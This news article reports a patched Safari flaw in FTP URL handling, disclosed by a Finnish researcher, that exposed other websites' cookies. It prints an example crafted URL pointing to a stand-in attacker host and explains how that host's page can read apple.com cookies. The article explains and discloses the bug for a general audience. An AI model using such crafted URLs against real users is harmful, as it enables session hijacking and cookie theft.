A security researcher in Finland has revealed the details of a potentially nasty flaw with Apple’s Safari web browser.
It comes after Apple patched the flaw with its Safari 8.0.5 update last week.
An attacker could create web content which, when viewed by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website,” Pynnönen wrote.
“Most websites which allow user logins store their authentication information (usually session keys) in cookies. Access to these cookies would allow hijacking authenticated sessions. Cookies can also contain other sensitive information,” he warned.
It seems the problem affected all versions of the Safari web browser, on iOS, OS X, and Windows machines. This includes Safari 7.0.4 on OS X 10.9.3; Safari on iPhone 3GS, iOS 6.1.6; Safari on iOS 8.1 simulator; and Safari 5.1.7 on Windows 8.1.
“The number of affected devices may be of the order of 1 billion,” he warned.
So how does the vulnerability work? Well, Pynnönen pointed out that Safari supports the FTP URL scheme that allows HTML documents to be accessed via URLs beginning with “ftp://”. These URLs can be of the form ftp://user:password@host/path. The problem arises when encoded special characters are used in the user or password parts.
For example, consider the following URL:
ftp://user%40ftp.attacker.tld%2Fexploit.html%23@apple.com/
If correctly interpreted, the URL refers to a document on apple.com. However, when loaded by a vulnerable browser, the network layer uses an extraneously decoded version of the URL:
ftp://user@ftp.attacker.tld/exploit.html#apple.com/
The document would be loaded from ftp.attacker.tld, not apple.com. Yet the document properties such as document.domain and document.cookie are correctly initialised using apple.com.
The attacker-supplied document, exploit.html, can therefore access and modify cookies belonging to apple.com via JavaScript.
Worried Safari users can check if their browser has the vulnerability by using the following vulnerability checker here.
Apple generally has a good reputation, although there have been a number of problems to do with the Safari web browser over the years.
This time last year for example, Apple had to patch 27 bugs in Safari that could have allowed hackers to target Safari users via specially-crafted sites
And last August, Apple had to issue a security update for Safari that fixed a WebKit vulnerability that could have allowed the execution of arbitrary code if a user visited a malicious website.
Other problems with Safari have also been exposed in the past which has resulted in Apple issuing patches.
Are you a security expert? Try our quiz!
Suspended prison sentence for Craig Wright for “flagrant breach” of court order, after his false…
Cash-strapped south American country agrees to sell or discontinue its national Bitcoin wallet after signing…
Google's change will allow advertisers to track customers' digital “fingerprints”, but UK data protection watchdog…
Welcome to Silicon In Focus Podcast: Tech in 2025! Join Steven Webb, UK Chief Technology…
European Commission publishes preliminary instructions to Apple on how to open up iOS to rivals,…
San Francisco jury finds Nima Momeni guilty of second-degree murder of Cash App founder Bob…